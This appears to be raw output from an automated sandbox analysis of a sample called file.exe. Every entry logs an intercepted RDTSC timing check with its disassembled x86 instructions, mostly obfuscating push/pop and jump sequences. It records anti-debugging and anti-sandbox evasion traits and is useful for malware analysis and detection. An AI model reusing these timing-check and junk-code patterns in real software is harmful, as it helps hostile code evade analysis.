Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07446 second address: D0745B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E810FCBAEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078B9 second address: D078C9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078C9 second address: D078F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F5E810FCBACh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jnc 00007F5E810FCBB8h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078F9 second address: D078FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078FD second address: D07913 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A0F second address: D07A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A13 second address: D07A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A19 second address: D07A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A1F second address: D07A3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b mov edx, dword ptr [ebp+122D2E2Dh] 0x00000011 nop 0x00000012 jnp 00007F5E810FCBB2h 0x00000018 je 00007F5E810FCBACh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A3F second address: D07A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5E8080F356h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A4D second address: D07A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07AF1 second address: D07AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07AF5 second address: D07B03 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07B03 second address: D07B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5E8080F35Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5E8080F362h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07B33 second address: D07B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5E810FCBB9h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E810FCBB2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07DDE second address: D07DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07DE4 second address: D07DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0820F second address: D08214 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D085AC second address: D085B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D085B2 second address: D0866C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F5E8080F358h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+1247BF53h] 0x0000002e call 00007F5E8080F35Dh 0x00000033 jl 00007F5E8080F358h 0x00000039 pushad 0x0000003a popad 0x0000003b pop ecx 0x0000003c push eax 0x0000003d ja 00007F5E8080F36Ch 0x00000043 mov dword ptr [esp], eax 0x00000046 add ecx, 3CCC3FBBh 0x0000004c lea eax, dword ptr [ebp+1247BF0Fh] 0x00000052 push 00000000h 0x00000054 push esi 0x00000055 call 00007F5E8080F358h 0x0000005a pop esi 0x0000005b mov dword ptr [esp+04h], esi 0x0000005f add dword ptr [esp+04h], 0000001Ch 0x00000067 inc esi 0x00000068 push esi 0x00000069 ret 0x0000006a pop esi 0x0000006b ret 0x0000006c pushad 0x0000006d mov edi, 3976B121h 0x00000072 add dword ptr [ebp+122D3A56h], edx 0x00000078 popad 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jns 00007F5E8080F35Ch 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D440CC second address: D440D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44475 second address: D44493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E8080F368h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D445E1 second address: D445FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBB4h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F19 second address: D48F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F26 second address: D48F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F2C second address: D48F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F30 second address: D48F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C169 second address: D4C185 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E8080F367h 0x00000008 jmp 00007F5E8080F361h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C185 second address: D4C1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBB0h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F5E810FCBB2h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E196 second address: D4E1B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E8080F35Eh 0x00000008 jbe 00007F5E8080F356h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F5E8080F358h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E1B2 second address: D4E1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E1B8 second address: D4E1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E1BE second address: D4E1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0011 second address: CC001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC001D second address: CC0023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50D6E second address: D50D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jne 00007F5E8080F356h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E8080F35Dh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54F15 second address: D54F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54753 second address: D54757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54757 second address: D5475D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D548BB second address: D548D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F5E8080F362h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D548D8 second address: D548E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E810FCBA6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58CF5 second address: D58D13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F5E8080F356h 0x00000011 jmp 00007F5E8080F35Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58D13 second address: D58D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBAEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57F88 second address: D57FD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F5E8080F364h 0x00000011 pop edx 0x00000012 jmp 00007F5E8080F364h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57FD0 second address: D57FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57FD8 second address: D57FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58169 second address: D5817C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F5E810FCBA6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5817C second address: D58182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58182 second address: D58187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58497 second address: D584C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E8080F370h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F5E8080F368h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 js 00007F5E8080F356h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5862C second address: D58632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480452 second address: 5480456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480456 second address: 548045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548045C second address: 548046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F35Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480216 second address: 548021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548021A second address: 5480220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480220 second address: 54802AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 70E5D11Fh 0x00000008 pushfd 0x00000009 jmp 00007F5E810FCBB4h 0x0000000e sbb ax, 1288h 0x00000013 jmp 00007F5E810FCBABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F5E810FCBB6h 0x00000022 push eax 0x00000023 pushad 0x00000024 mov ax, di 0x00000027 pushfd 0x00000028 jmp 00007F5E810FCBADh 0x0000002d add cx, B856h 0x00000032 jmp 00007F5E810FCBB1h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a jmp 00007F5E810FCBAEh 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov dx, F890h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480EA6 second address: 5480F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 66EAh 0x00000007 mov ebx, 1F8307B6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5E8080F363h 0x00000017 adc eax, 268EC03Eh 0x0000001d jmp 00007F5E8080F369h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F5E8080F360h 0x00000029 add cx, F538h 0x0000002e jmp 00007F5E8080F35Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 pushad 0x00000039 jmp 00007F5E8080F362h 0x0000003e mov ah, 03h 0x00000040 popad 0x00000041 call 00007F5E8080F367h 0x00000046 call 00007F5E8080F368h 0x0000004b pop ecx 0x0000004c pop edi 0x0000004d popad 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F60 second address: 5480F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F64 second address: 5480F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C08B5 second address: 54C08BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C08BB second address: 54C08BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C08BF second address: 54C08C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0040 second address: 54A0077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e call 00007F5E8080F363h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0077 second address: 54A008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov cl, dl 0x0000000a mov si, 0AF3h 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A008E second address: 54A0092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0092 second address: 54A0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0096 second address: 54A009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A009C second address: 54A00D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F5E810FCBB0h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5E810FCBB7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54803B0 second address: 54803B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54803B4 second address: 54803BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490BED second address: 5490C13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E8080F35Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E3C second address: 5490E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5E810FCBB7h 0x00000008 pop eax 0x00000009 mov ch, dl 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E810FCBAEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0053 second address: 54C0057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0057 second address: 54C0074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0074 second address: 54C007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C007A second address: 54C007E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C01C3 second address: 54C0205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F5E8080F367h 0x00000011 and ecx, 1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, dx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0205 second address: 54C020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C020A second address: 54C0227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F369h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0227 second address: 54C026E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E810FCBB6h 0x00000011 add ecx, 69019F08h 0x00000017 jmp 00007F5E810FCBABh 0x0000001c popfd 0x0000001d popad 0x0000001e leave 0x0000001f pushad 0x00000020 push esi 0x00000021 jmp 00007F5E810FCBABh 0x00000026 pop ecx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C026E second address: 54C02BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5E8080F365h 0x0000000a and cx, B8D6h 0x0000000f jmp 00007F5E8080F361h 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 retn 0004h 0x0000001a nop 0x0000001b mov esi, eax 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 xor esi, dword ptr [00B52014h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d call 00007F5E851BF53Ah 0x00000032 push FFFFFFFEh 0x00000034 jmp 00007F5E8080F35Eh 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C02BB second address: 54C02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C02C1 second address: 54C031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E8080F362h 0x00000009 add cx, D958h 0x0000000e jmp 00007F5E8080F35Bh 0x00000013 popfd 0x00000014 jmp 00007F5E8080F368h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c ret 0x0000001d nop 0x0000001e push eax 0x0000001f call 00007F5E851BF593h 0x00000024 mov edi, edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5E8080F367h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C031F second address: 54C0388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E810FCBACh 0x00000011 or cl, 00000078h 0x00000014 jmp 00007F5E810FCBABh 0x00000019 popfd 0x0000001a movzx eax, bx 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 movzx eax, bx 0x00000023 jmp 00007F5E810FCBADh 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ecx, edx 0x0000002f call 00007F5E810FCBAFh 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
